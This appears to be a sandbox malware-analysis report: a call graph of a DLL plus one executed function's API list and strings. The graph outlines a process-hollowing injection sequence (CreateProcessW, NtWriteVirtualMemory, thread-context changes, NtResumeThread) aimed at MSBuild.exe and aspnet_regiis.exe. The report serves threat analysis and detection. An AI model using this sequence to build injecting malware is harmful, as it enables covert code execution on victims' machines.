___scrt_is_nonwritable_in_current_image 11988->11989 11996 6d59b983 EnterCriticalSection 11989->11996 11991 6d59ac77 11997 6d59acb8 11991->11997 11996->11991 11998 6d59acd7 11997->11998 11999 6d59ac84 11997->11999 11998->11999 12000 6d59bda4 ___free_lconv_mon 14 API calls 11998->12000 12001 6d59acac 11999->12001 12000->11999 12004 6d59b9cb LeaveCriticalSection 12001->12004 12003 6d59ac95 12003->11976 12004->12003 12006 6d59a5ad 12005->12006 12006->11986 12007 6d59a69e GetModuleHandleExW 12006->12007 12008 6d59a6dd GetProcAddress 12007->12008 12011 6d59a6f1 12007->12011 12008->12011 12009 6d59a70d 12009->11986 12010 6d59a704 FreeLibrary 12010->12009 12011->12009 12011->12010 12013 6d59a437 ___scrt_is_nonwritable_in_current_image 12012->12013 12027 6d59b983 EnterCriticalSection 12013->12027 12015 6d59a441 12028 6d59a493 12015->12028 12017 6d59a44e 12032 6d59a46c 12017->12032 12020 6d59a612 12036 6d59a685 12020->12036 12022 6d59a61c 12023 6d59a630 12022->12023 12024 6d59a620 GetCurrentProcess TerminateProcess 12022->12024 12025 6d59a69e _unexpected 3 API calls 12023->12025 12024->12023 12026 6d59a638 ExitProcess 12025->12026 12027->12015 12031 6d59a49f ___scrt_is_nonwritable_in_current_image _unexpected 12028->12031 12029 6d59a503 _unexpected 12029->12017 12030 6d59ad92 __DllMainCRTStartup@12 14 API calls 12030->12029 12031->12029 12031->12030 12035 6d59b9cb LeaveCriticalSection 12032->12035 12034 6d59a45a 12034->11983 12034->12020 12035->12034 12039 6d59ba07 12036->12039 12038 6d59a68a _unexpected 12038->12022 12040 6d59ba16 _unexpected 12039->12040 12041 6d59ba23 12040->12041 12043 6d59d5aa 12040->12043 12041->12038 12044 6d59d525 __dosmaperr 5 API calls 12043->12044 12045 6d59d5c6 12044->12045 12045->12041 12047 6d597791 12046->12047 12048 6d59873a 12046->12048 12047->11495 12048->12047 12049 6d59afb9 ___std_exception_destroy 14 API calls 12048->12049 12049->12048 12051 6d59af46 12050->12051 12054 6d59af58 ___scrt_uninitialize_crt 12050->12054 12052 6d59af54 12051->12052 12055 6d59e175 12051->12055 12052->11964 12054->11964 12058 6d59e006 12055->12058 12061 6d59df5a 12058->12061 12062 6d59df66 ___scrt_is_nonwritable_in_current_image 12061->12062 12069 6d59b983 EnterCriticalSection 12062->12069 12064 6d59dfdc 12078 6d59dffa 12064->12078 12066 6d59df70 ___scrt_uninitialize_crt 12066->12064 12070 6d59dece 12066->12070 12069->12066 12071 6d59deda ___scrt_is_nonwritable_in_current_image 12070->12071 12081 6d59e292 EnterCriticalSection 12071->12081 12073 6d59dee4 ___scrt_uninitialize_crt 12077 6d59df1d 12073->12077 12082 6d59e110 12073->12082 12093 6d59df4e 12077->12093 12148 6d59b9cb LeaveCriticalSection 12078->12148 12080 6d59dfe8 12080->12052 12081->12073 12083 6d59e125 ___std_exception_copy 12082->12083 12084 6d59e12c 12083->12084 12085 6d59e137 12083->12085 12086 6d59e006 ___scrt_uninitialize_crt 68 API calls 12084->12086 12096 6d59e0a7 12085->12096 12089 6d59e132 ___std_exception_copy 12086->12089 12089->12077 12091 6d59e158 12109 6d59f7a8 12091->12109 12147 6d59e2a6 LeaveCriticalSection 12093->12147 12095 6d59df3c 12095->12066 12097 6d59e0c0 12096->12097 12101 6d59e0e7 12096->12101 12098 6d59e4f7 ___scrt_uninitialize_crt 29 API calls 12097->12098 12097->12101 12099 6d59e0dc 12098->12099 12120 6d59ffc8 12099->12120 12101->12089 12102 6d59e4f7 12101->12102 12103 6d59e518 12102->12103 12104 6d59e503 12102->12104 12103->12091 12105 6d59bd34 __dosmaperr 14 API calls 12104->12105 12106 6d59e508 12105->12106 12131 6d59bc53 12106->12131 12110 6d59f7b9 12109->12110 12111 6d59f7c6 12109->12111 12112 6d59bd34 __dosmaperr 14 API calls 12110->12112 12113 6d59f80f 12111->12113 12117 6d59f7ed 12111->12117 12115 6d59f7be 12112->12115 12114 6d59bd34 __dosmaperr 14 API calls 12113->12114 12116 6d59f814 12114->12116 12115->12089 12119 6d59bc53 ___std_exception_copy 29 API calls 12116->12119 12134 6d59f706 12117->12134 12119->12115 12121 6d59ffd4 ___scrt_is_nonwritable_in_current_image 12120->12121 12122 6d5a0015 12121->12122 12124 6d5a005b 12121->12124 12130 6d59ffdc 12121->12130 12123 6d59bbd6 ___std_exception_copy 29 API calls 12122->12123 12123->12130 12125 6d59f5c5 ___scrt_uninitialize_crt EnterCriticalSection 12124->12125 12126 6d5a0061 12125->12126 12127 6d5a007f 12126->12127 12128 6d5a00d9 ___scrt_uninitialize_crt 62 API calls 12126->12128 12129 6d5a00d1 ___scrt_uninitialize_crt LeaveCriticalSection 12127->12129 12128->12127 12129->12130 12130->12101 12132 6d59bb9f ___std_exception_copy 29 API calls 12131->12132 12133 6d59bc5f 12132->12133 12133->12091 12135 6d59f712 ___scrt_is_nonwritable_in_current_image 12134->12135 12136 6d59f5c5 ___scrt_uninitialize_crt EnterCriticalSection 12135->12136 12137 6d59f721 12136->12137 12138 6d59f766 12137->12138 12140 6d59f69c ___scrt_uninitialize_crt 29 API calls 12137->12140 12139 6d59bd34 __dosmaperr 14 API calls 12138->12139 12141 6d59f76d 12139->12141 12142 6d59f74d FlushFileBuffers 12140->12142 12145 6d59f79c ___scrt_uninitialize_crt LeaveCriticalSection 12141->12145 12142->12141 12143 6d59f759 GetLastError 12142->12143 12144 6d59bd21 __dosmaperr 14 API calls 12143->12144 12144->12138 12146 6d59f785 12145->12146 12146->12115 12147->12095 12148->12080 12154 6d59af6b 12149->12154 12152 6d598c01 ___vcrt_uninitialize_ptd 6 API calls 12153 6d59745f 12152->12153 12153->11486 12157 6d59b928 12154->12157 12158 6d5978f5 12157->12158 12159 6d59b932 12157->12159 12158->12152 12161 6d59d648 12159->12161 12162 6d59d525 __dosmaperr 5 API calls 12161->12162 12163 6d59d664 12162->12163 12164 6d59d66d 12163->12164 12165 6d59d67f TlsFree 12163->12165 12164->12158 12167 6d597259 IsProcessorFeaturePresent 12166->12167 12168 6d597258 12166->12168 12170 6d5975fe 12167->12170 12168->11972 12173 6d5975c1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12170->12173 12172 6d5976e1 12172->11972 12173->12172 12174 6d59759e 12175 6d5975ac 12174->12175 12176 6d5975a7 12174->12176 12180 6d597468 12175->12180 12195 6d597730 12176->12195 12182 6d597474 ___scrt_is_nonwritable_in_current_image 12180->12182 12181 6d59749d dllmain_raw 12184 6d5974b7 dllmain_crt_dispatch 12181->12184 12192 6d597483 12181->12192 12182->12181 12183 6d597498 12182->12183 12182->12192 12185 6d596c40 __DllMainCRTStartup@12 5 API calls 12183->12185 12184->12183 12184->12192 12186 6d5974d8 12185->12186 12187 6d597509 12186->12187 12189 6d596c40 __DllMainCRTStartup@12 5 API calls 12186->12189 12188 6d597512 dllmain_crt_dispatch 12187->12188 12187->12192 12190 6d597525 dllmain_raw 12188->12190 12188->12192 12191 6d5974f0 12189->12191 12190->12192 12193 6d5973b8 __DllMainCRTStartup@12 86 API calls 12191->12193 12194 6d5974fe dllmain_raw 12193->12194 12194->12187 12196 6d597746 12195->12196 12198 6d59774f 12196->12198 12199 6d5976e3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12196->12199 12198->12175 12199->12198 12200 fc5170 12203 fc5183 12200->12203 12201 fc5351 12203->12201 12207 fc4d6c 12203->12207 12211 fc6060 12203->12211 12215 fc605f 12203->12215 12219 fc4d78 12203->12219 12208 fc61b0 CloseHandle 12207->12208 12210 fc621e 12208->12210 12210->12203 12212 fc609e 12211->12212 12223 6d593c10 12212->12223 12216 fc609e 12215->12216 12218 6d593c10 48 API calls 12216->12218 12217 fc60c1 12217->12203 12218->12217 12220 fc5e20 LoadLibraryW 12219->12220 12222 fc5e9f 12220->12222 12222->12203 12246 6d593c6f _unexpected 12223->12246 12224 6d596970 NtWriteVirtualMemory 12225 6d5969cd 12224->12225 12225->12246 12226 6d595f37 NtWriteVirtualMemory 12226->12246 12227 6d594dbb CreateProcessW 12227->12246 12228 6d5961f9 NtWriteVirtualMemory 12228->12246 12229 6d5968c4 NtGetContextThread 12229->12246 12230 6d594bca VirtualAlloc 12230->12246 12231 6d596726 CloseHandle CloseHandle 12231->12246 12234 6d596512 NtCreateThreadEx 12234->12246 12235 6d596630 NtSetContextThread NtResumeThread 12235->12246 12236 6d5956c4 NtWriteVirtualMemory 12236->12246 12237 6d595148 NtAllocateVirtualMemory 12237->12246 12238 6d596877 12239 6d597250 _ValidateLocalCookies 5 API calls 12238->12239 12240 fc60c1 12239->12240 12240->12203 12241 6d596bf4 CloseHandle CloseHandle 12241->12246 12242 6d596b36 NtCreateThreadEx 12242->12246 12243 6d595198 NtWriteVirtualMemory 12243->12246 12244 6d594a5c GetConsoleWindow ShowWindow 12252 6d591360 12244->12252 12246->12224 12246->12226 12246->12227 12246->12228 12246->12229 12246->12230 12246->12231 12246->12234 12246->12235 12246->12236 12246->12237 12246->12238 12246->12241 12246->12242 12246->12243 12246->12244 12247 6d591360 23 API calls 12246->12247 12248 6d595e41 NtReadVirtualMemory 12246->12248 12250 6d594ed2 NtGetContextThread 12246->12250 12251 6d59532a NtWriteVirtualMemory 12246->12251 12275 6d5936d0 12246->12275 12282 6d591000 12246->12282 12247->12246 12248->12246 12250->12246 12251->12246 12268 6d591389 __InternalCxxFrameHandler 12252->12268 12253 6d5920d2 CloseHandle 12253->12268 12254 6d591dd9 CreateFileA 12254->12268 12255 6d59252a VirtualProtect 12255->12268 12256 6d5921be MapViewOfFile 12256->12268 12257 6d591a35 GetCurrentProcess 12286 6d597e70 12257->12286 12259 6d592a43 GetModuleFileNameA 12259->12268 12260 6d591a61 GetModuleHandleA 12260->12268 12261 6d591bfc K32GetModuleInformation 12261->12268 12262 6d59276e CloseHandle CloseHandle 12262->12268 12263 6d591f42 CreateFileMappingA 12263->12268 12264 6d591d09 GetModuleFileNameA 12264->12268 12265 6d5927f6 CloseHandle 12265->12268 12266 6d592be7 CloseHandle 12266->12268 12267 6d592ad6 CreateFileMappingA 12267->12268 12268->12253 12268->12254 12268->12255 12268->12256 12268->12257 12268->12259 12268->12261 12268->12262 12268->12263 12268->12264 12268->12265 12268->12266 12268->12267 12269 6d592615 VirtualProtect 12268->12269 12270 6d5929f9 K32GetModuleInformation 12268->12270 12271 6d592a76 CreateFileA 12268->12271 12272 6d5929d8 12268->12272 12269->12268 12270->12268 12271->12268 12273 6d597250 _ValidateLocalCookies 5 API calls 12272->12273 12274 6d5929e2 12273->12274 12274->12246 12280 6d593721 _unexpected 12275->12280 12276 6d593afa 12277 6d597250 _ValidateLocalCookies 5 API calls 12276->12277 12278 6d593b0a NtAllocateVirtualMemory 12277->12278 12278->12246 12279 6d593922 GetModuleHandleW 12279->12280 12280->12276 12280->12279 12281 6d59397d NtQueryInformationProcess 12280->12281 12281->12280 12285 6d59105f 12282->12285 12283 6d597250 _ValidateLocalCookies 5 API calls 12284 6d5912fc 12283->12284 12284->12246 12285->12283 12287 6d597e87 12286->12287 12287->12260 12287->12287 12288 6d59aa67 12303 6d59cda8 12288->12303 12293 6d59aa8f 12331 6d59aac0 12293->12331 12294 6d59aa83 12296 6d59bda4 ___free_lconv_mon 14 API calls 12294->12296 12297 6d59aa89 12296->12297 12299 6d59bda4 ___free_lconv_mon 14 API calls 12300 6d59aab3 12299->12300 12301 6d59bda4 ___free_lconv_mon 14 API calls 12300->12301 12302 6d59aab9 12301->12302 12304 6d59aa78 12303->12304 12305 6d59cdb1 12303->12305 12309 6d59d2ff GetEnvironmentStringsW 12304->12309 12353 6d59b712 12305->12353 12310 6d59aa7d 12309->12310 12311 6d59d317 12309->12311 12310->12293 12310->12294 12312 6d59d25c ___scrt_uninitialize_crt WideCharToMultiByte 12311->12312 12313 6d59d334 12312->12313 12314 6d59d349 12313->12314 12315 6d59d33e FreeEnvironmentStringsW 12313->12315 12316 6d59e2ba 15 API calls 12314->12316 12315->12310 12317 6d59d350 12316->12317 12318 6d59d369 12317->12318 12319 6d59d358 12317->12319 12321 6d59d25c ___scrt_uninitialize_crt WideCharToMultiByte 12318->12321 12320 6d59bda4 ___free_lconv_mon 14 API calls 12319->12320 12322 6d59d35d FreeEnvironmentStringsW 12320->12322 12323 6d59d379 12321->12323 12324 6d59d39a 12322->12324 12325 6d59d388 12323->12325 12326 6d59d380 12323->12326 12324->12310 12328 6d59bda4 ___free_lconv_mon 14 API calls 12325->12328 12327 6d59bda4 ___free_lconv_mon 14 API calls 12326->12327 12329 6d59d386 FreeEnvironmentStringsW 12327->12329 12328->12329 12329->12324 12332 6d59aad5 12331->12332 12333 6d59bd47 __dosmaperr 14 API calls 12332->12333 12334 6d59aafc 12333->12334 12335 6d59ab04 12334->12335 12344 6d59ab0e 12334->12344 12336 6d59bda4 ___free_lconv_mon 14 API calls 12335->12336 12352 6d59aa96 12336->12352 12337 6d59ab6b 12338 6d59bda4 ___free_lconv_mon 14 API calls 12337->12338 12338->12352 12339 6d59bd47 __dosmaperr 14 API calls 12339->12344 12340 6d59ab7a 12709 6d59aba2 12340->12709 12344->12337 12344->12339 12344->12340 12346 6d59ab95 12344->12346 12349 6d59bda4 ___free_lconv_mon 14 API calls 12344->12349 12700 6d59afdf 12344->12700 12345 6d59bda4 ___free_lconv_mon 14 API calls 12348 6d59ab87 12345->12348 12715 6d59bc63 IsProcessorFeaturePresent 12346->12715 12351 6d59bda4 ___free_lconv_mon 14 API calls 12348->12351 12349->12344 12350 6d59aba1 12351->12352 12352->12299 12354 6d59b71d 12353->12354 12355 6d59b723 12353->12355 12356 6d59d687 __dosmaperr 6 API calls 12354->12356 12357 6d59d6c6 __dosmaperr 6 API calls 12355->12357 12359 6d59b729 12355->12359 12356->12355 12358 6d59b73d 12357->12358 12358->12359 12360 6d59bd47 __dosmaperr 14 API calls 12358->12360 12377 6d59b72e 12359->12377 12401 6d59b039 12359->12401 12363 6d59b74d 12360->12363 12364 6d59b76a 12363->12364 12365 6d59b755 12363->12365 12366 6d59d6c6 __dosmaperr 6 API calls 12364->12366 12367 6d59d6c6 __dosmaperr 6 API calls 12365->12367 12368 6d59b776 12366->12368 12369 6d59b761 12367->12369 12370 6d59b789 12368->12370 12371 6d59b77a 12368->12371 12372 6d59bda4 ___free_lconv_mon 14 API calls 12369->12372 12374 6d59b459 __dosmaperr 14 API calls 12370->12374 12373 6d59d6c6 __dosmaperr 6 API calls 12371->12373 12372->12359 12373->12369 12375 6d59b794 12374->12375 12376 6d59bda4 ___free_lconv_mon 14 API calls 12375->12376 12376->12377 12378 6d59cbb3 12377->12378 12496 6d59cd08 12378->12496 12385 6d59cc1d 12521 6d59ce03 12385->12521 12386 6d59cc0f 12387 6d59bda4 ___free_lconv_mon 14 API calls 12386->12387 12389 6d59cbf6 12387->12389 12389->12304 12391 6d59cc55 12392 6d59bd34 __dosmaperr 14 API calls 12391->12392 12394 6d59cc5a 12392->12394 12393 6d59cc9c 12396 6d59cce5 12393->12396 12532 6d59c82c 12393->12532 12397 6d59bda4 ___free_lconv_mon 14 API calls 12394->12397 12395 6d59cc70 12395->12393 12398 6d59bda4 ___free_lconv_mon 14 API calls 12395->12398 12400 6d59bda4 ___free_lconv_mon 14 API calls 12396->12400 12397->12389 12398->12393 12400->12389 12412 6d59dc35 12401->12412 12404 6d59b049 12406 6d59b053 IsProcessorFeaturePresent 12404->12406 12407 6d59b072 12404->12407 12408 6d59b05f 12406->12408 12448 6d59a73e 12407->12448 12442 6d59ba57 12408->12442 12451 6d59db63 12412->12451 12415 6d59dc7a 12419 6d59dc86 ___scrt_is_nonwritable_in_current_image 12415->12419 12416 6d59b7a8 __dosmaperr 14 API calls 12425 6d59dcb7 _unexpected 12416->12425 12417 6d59dcd6 12418 6d59bd34 __dosmaperr 14 API calls 12417->12418 12421 6d59dcdb 12418->12421 12419->12416 12419->12417 12420 6d59dce8 _unexpected 12419->12420 12419->12425 12422 6d59dd1e _unexpected 12420->12422 12462 6d59b983 EnterCriticalSection 12420->12462 12423 6d59bc53 ___std_exception_copy 29 API calls 12421->12423 12427 6d59de58 12422->12427 12428 6d59dd5b 12422->12428 12438 6d59dd89 12422->12438 12441 6d59dcc0 12423->12441 12425->12417 12425->12420 12425->12441 12430 6d59de63 12427->12430 12494 6d59b9cb LeaveCriticalSection 12427->12494 12428->12438 12463 6d59b657 GetLastError 12428->12463 12431 6d59a73e _unexpected 21 API calls 12430->12431 12433 6d59de6b 12431->12433 12435 6d59b657 _unexpected 39 API calls 12439 6d59ddde 12435->12439 12437 6d59b657 _unexpected 39 API calls 12437->12438 12490 6d59de04 12438->12490 12440 6d59b657 _unexpected 39 API calls 12439->12440 12439->12441 12440->12441 12441->12404 12443 6d59ba73 _unexpected 12442->12443 12444 6d59ba9f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12443->12444 12447 6d59bb70 _unexpected 12444->12447 12445 6d597250 _ValidateLocalCookies 5 API calls 12446 6d59bb8e 12445->12446 12446->12407 12447->12445 12449 6d59a57b _unexpected 21 API calls 12448->12449 12450 6d59a74f 12449->12450 12452 6d59db6f ___scrt_is_nonwritable_in_current_image 12451->12452 12457 6d59b983 EnterCriticalSection 12452->12457 12454 6d59db7d 12458 6d59dbbf 12454->12458 12457->12454 12461 6d59b9cb LeaveCriticalSection 12458->12461 12460 6d59b03e 12460->12404 12460->12415 12461->12460 12462->12422 12464 6d59b66d 12463->12464 12465 6d59b673 12463->12465 12466 6d59d687 __dosmaperr 6 API calls 12464->12466 12467 6d59d6c6 __dosmaperr 6 API calls 12465->12467 12469 6d59b677 SetLastError 12465->12469 12466->12465 12468 6d59b68f 12467->12468 12468->12469 12471 6d59bd47 __dosmaperr 14 API calls 12468->12471 12473 6d59b70c 12469->12473 12474 6d59b707 12469->12474 12472 6d59b6a4 12471->12472 12475 6d59b6bd 12472->12475 12476 6d59b6ac 12472->12476 12477 6d59b039 CallUnexpected 37 API calls 12473->12477 12474->12437 12479 6d59d6c6 __dosmaperr 6 API calls 12475->12479 12478 6d59d6c6 __dosmaperr 6 API calls 12476->12478 12480 6d59b711 12477->12480 12487 6d59b6ba 12478->12487 12481 6d59b6c9 12479->12481 12482 6d59b6cd 12481->12482 12483 6d59b6e4 12481->12483 12484 6d59d6c6 __dosmaperr 6 API calls 12482->12484 12486 6d59b459 __dosmaperr 14 API calls 12483->12486 12484->12487 12485 6d59bda4 ___free_lconv_mon 14 API calls 12485->12469 12488 6d59b6ef 12486->12488 12487->12485 12489 6d59bda4 ___free_lconv_mon 14 API calls 12488->12489 12489->12469 12491 6d59de08 12490->12491 12492 6d59ddd0 12490->12492 12495 6d59b9cb LeaveCriticalSection 12491->12495 12492->12435 12492->12439 12492->12441 12494->12430 12495->12492 12497 6d59cd14 ___scrt_is_nonwritable_in_current_image 12496->12497 12498 6d59cd2e 12497->12498 12540 6d59b983 EnterCriticalSection 12497->12540 12500 6d59cbdd 12498->12500 12503 6d59b039 CallUnexpected 39 API calls 12498->12503 12507 6d59c93a 12500->12507 12501 6d59cd6a 12541 6d59cd87 12501->12541 12504 6d59cda7 12503->12504 12505 6d59cd3e 12505->12501 12506 6d59bda4 ___free_lconv_mon 14 API calls 12505->12506 12506->12501 12545 6d59c43e 12507->12545 12510 6d59c95b GetOEMCP 12512 6d59c984 12510->12512 12511 6d59c96d 12511->12512 12513 6d59c972 GetACP 12511->12513 12512->12389 12514 6d59e2ba 12512->12514 12513->12512 12515 6d59e2f8 12514->12515 12519 6d59e2c8 __dosmaperr 12514->12519 12516 6d59bd34 __dosmaperr 14 API calls 12515->12516 12518 6d59cc07 12516->12518 12517 6d59e2e3 HeapAlloc 12517->12518 12517->12519 12518->12385 12518->12386 12519->12515 12519->12517 12520 6d59dae0 __dosmaperr 2 API calls 12519->12520 12520->12519 12522 6d59c93a 41 API calls 12521->12522 12523 6d59ce23 12522->12523 12525 6d59ce60 IsValidCodePage 12523->12525 12530 6d59cf28 12523->12530 12531 6d59ce7b _unexpected 12523->12531 12524 6d597250 _ValidateLocalCookies 5 API calls 12526 6d59cc4a 12524->12526 12527 6d59ce72 12525->12527 12525->12530 12526->12391 12526->12395 12528 6d59ce9b GetCPInfo 12527->12528 12527->12531 12528->12530 12528->12531 12530->12524 12588 6d59ca0e 12531->12588 12533 6d59c838 ___scrt_is_nonwritable_in_current_image 12532->12533 12674 6d59b983 EnterCriticalSection 12533->12674 12535 6d59c842 12675 6d59c879 12535->12675 12540->12505 12544 6d59b9cb LeaveCriticalSection 12541->12544 12543 6d59cd8e 12543->12498 12544->12543 12546 6d59c455 12545->12546 12547 6d59c45c 12545->12547 12546->12510 12546->12511 12547->12546 12548 6d59b657 _unexpected 39 API calls 12547->12548 12549 6d59c47d 12548->12549 12553 6d59e308 12549->12553 12554 6d59e31b 12553->12554 12556 6d59c493 12553->12556 12554->12556 12561 6d59e887 12554->12561 12557 6d59e366 12556->12557 12558 6d59e379 12557->12558 12559 6d59e38e 12557->12559 12558->12559 12583 6d59cdf0 12558->12583 12559->12546 12562 6d59e893 ___scrt_is_nonwritable_in_current_image 12561->12562 12563 6d59b657 _unexpected 39 API calls 12562->12563 12564 6d59e89c 12563->12564 12571 6d59e8e2 12564->12571 12574 6d59b983 EnterCriticalSection 12564->12574 12566 6d59e8ba 12575 6d59e908 12566->12575 12571->12556 12572 6d59b039 CallUnexpected 39 API calls 12573 6d59e907 12572->12573 12574->12566 12576 6d59e8cb 12575->12576 12577 6d59e916 __dosmaperr 12575->12577 12579 6d59e8e7 12576->12579 12577->12576 12578 6d59e63b __dosmaperr 14 API calls 12577->12578 12578->12576 12582 6d59b9cb LeaveCriticalSection 12579->12582 12581 6d59e8de 12581->12571 12581->12572 12582->12581 12584 6d59b657 _unexpected 39 API calls 12583->12584 12585 6d59cdf5 12584->12585 12586 6d59cd08 ___scrt_uninitialize_crt 39 API calls 12585->12586 12587 6d59ce00 12586->12587 12587->12559 12589 6d59ca36 GetCPInfo 12588->12589 12590 6d59caff 12588->12590 12589->12590 12595 6d59ca4e 12589->12595 12592 6d597250 _ValidateLocalCookies 5 API calls 12590->12592 12594 6d59cbb1 12592->12594 12594->12530 12599 6d59eff7 12595->12599 12598 6d59f307 43 API calls 12598->12590 12600 6d59c43e 39 API calls 12599->12600 12601 6d59f017 12600->12601 12619 6d59d1a2 12601->12619 12603 6d59f0d3 12606 6d597250 _ValidateLocalCookies 5 API calls 12603->12606 12604 6d59f0cb 12622 6d59f0f8 12604->12622 12605 6d59f044 12605->12603 12605->12604 12608 6d59e2ba 15 API calls 12605->12608 12610 6d59f069 _unexpected __alloca_probe_16 12605->12610 12609 6d59cab6 12606->12609 12608->12610 12614 6d59f307 12609->12614 12610->12604 12611 6d59d1a2 ___scrt_uninitialize_crt MultiByteToWideChar 12610->12611 12612 6d59f0b2 12611->12612 12612->12604 12613 6d59f0b9 GetStringTypeW 12612->12613 12613->12604 12615 6d59c43e 39 API calls 12614->12615 12616 6d59f31a 12615->12616 12628 6d59f118 12616->12628 12626 6d59d10a 12619->12626 12623 6d59f104 12622->12623 12624 6d59f115 12622->12624 12623->12624 12625 6d59bda4 ___free_lconv_mon 14 API calls 12623->12625 12624->12603 12625->12624 12627 6d59d11b MultiByteToWideChar 12626->12627 12627->12605 12629 6d59f133 12628->12629 12630 6d59d1a2 ___scrt_uninitialize_crt MultiByteToWideChar 12629->12630 12634 6d59f177 12630->12634 12631 6d59f2f2 12632 6d597250 _ValidateLocalCookies 5 API calls 12631->12632 12633 6d59cad7 12632->12633 12633->12598 12634->12631 12635 6d59e2ba 15 API calls 12634->12635 12637 6d59f19d __alloca_probe_16 12634->12637 12655 6d59f245 12634->12655 12635->12637 12636 6d59f0f8 __freea 14 API calls 12636->12631 12638 6d59d1a2 ___scrt_uninitialize_crt MultiByteToWideChar 12637->12638 12637->12655 12639 6d59f1e6 12638->12639 12639->12655 12656 6d59d753 12639->12656 12642 6d59f21c 12648 6d59d753 6 API calls 12642->12648 12642->12655 12643 6d59f254 12644 6d59f2dd 12643->12644 12645 6d59f266 __alloca_probe_16 12643->12645 12646 6d59e2ba 15 API calls 12643->12646 12647 6d59f0f8 __freea 14 API calls 12644->12647 12645->12644 12649 6d59d753 6 API calls 12645->12649 12646->12645 12647->12655 12648->12655 12650 6d59f2a9 12649->12650 12650->12644 12662 6d59d25c 12650->12662 12652 6d59f2c3 12652->12644 12653 6d59f2cc 12652->12653 12654 6d59f0f8 __freea 14 API calls 12653->12654 12654->12655 12655->12636 12665 6d59d426 12656->12665 12660 6d59d7a4 LCMapStringW 12661 6d59d764 12660->12661 12661->12642 12661->12643 12661->12655 12663 6d59d26f ___scrt_uninitialize_crt 12662->12663 12664 6d59d2ad WideCharToMultiByte 12663->12664 12664->12652 12666 6d59d525 __dosmaperr 5 API calls 12665->12666 12667 6d59d43c 12666->12667 12667->12661 12668 6d59d7b0 12667->12668 12671 6d59d440 12668->12671 12670 6d59d7bb 12670->12660 12672 6d59d525 __dosmaperr 5 API calls 12671->12672 12673 6d59d456 12672->12673 12673->12670 12674->12535 12685 6d59d008 12675->12685 12677 6d59c89b 12678 6d59d008 29 API calls 12677->12678 12679 6d59c8ba 12678->12679 12680 6d59c84f 12679->12680 12681 6d59bda4 ___free_lconv_mon 14 API calls 12679->12681 12682 6d59c86d 12680->12682 12681->12680 12699 6d59b9cb LeaveCriticalSection 12682->12699 12684 6d59c85b 12684->12396 12686 6d59d019 12685->12686 12690 6d59d015 __InternalCxxFrameHandler 12685->12690 12687 6d59d020 12686->12687 12692 6d59d033 _unexpected 12686->12692 12688 6d59bd34 __dosmaperr 14 API calls 12687->12688 12689 6d59d025 12688->12689 12691 6d59bc53 ___std_exception_copy 29 API calls 12689->12691 12690->12677 12691->12690 12692->12690 12693 6d59d06a 12692->12693 12694 6d59d061 12692->12694 12693->12690 12696 6d59bd34 __dosmaperr 14 API calls 12693->12696 12695 6d59bd34 __dosmaperr 14 API calls 12694->12695 12697 6d59d066 12695->12697 12696->12697 12698 6d59bc53 ___std_exception_copy 29 API calls 12697->12698 12698->12690 12699->12684 12701 6d59afed 12700->12701 12703 6d59affb 12700->12703 12701->12703 12707 6d59b013 12701->12707 12702 6d59bd34 __dosmaperr 14 API calls 12704 6d59b003 12702->12704 12703->12702 12705 6d59bc53 ___std_exception_copy 29 API calls 12704->12705 12706 6d59b00d 12705->12706 12706->12344 12707->12706 12708 6d59bd34 __dosmaperr 14 API calls 12707->12708 12708->12704 12710 6d59abaf 12709->12710 12714 6d59ab80 12709->12714 12711 6d59abc6 12710->12711 12712 6d59bda4 ___free_lconv_mon 14 API calls 12710->12712 12713 6d59bda4 ___free_lconv_mon 14 API calls 12711->12713 12712->12710 12713->12714 12714->12345 12716 6d59bc6f 12715->12716 12717 6d59ba57 _unexpected 8 API calls 12716->12717 12718 6d59bc84 GetCurrentProcess TerminateProcess 12717->12718 12718->12350

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 6D593C10 Relevance: 65.9, APIs: 23, Strings: 13, Instructions: 2921nativethreadmemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Virtual$Memory$Thread$CloseHandleWrite$Context$AllocateCreateWindow$AllocConsoleReadResumeShow
                                                                                                                                                                                                                                                • String ID: --,B$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$FFd$FFd$G!?V$G!?V$kZEGDH2SkpIGRNUIiQYMeZKSksqRkZGRkQaEWXaEgfBddoSBYJsOo5AIx5CfguLHDrCQDpiRgv3ODpmHgvXLCbldkgmdEZ2S4JARoJAJzxGvknHGCawRrJJxw4m3iZxhp4$kernel32.dll$ntdll.dll$|+}
                                                                                                                                                                                                                                                • API String ID: 2473863479-2953360706
                                                                                                                                                                                                                                                • Opcode ID: 44aad0f5bf3729cf3d1470ad702a2a8b76bcd652712fa619aa3e17ce4569e271
                                                                                                                                                                                                                                                • Instruction ID: 24be79d9e52b63aa23e7ffea0706bd7d2ab34655fa31c5e05960e93a45329f75
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44aad0f5bf3729cf3d1470ad702a2a8b76bcd652712fa619aa3e17ce4569e271
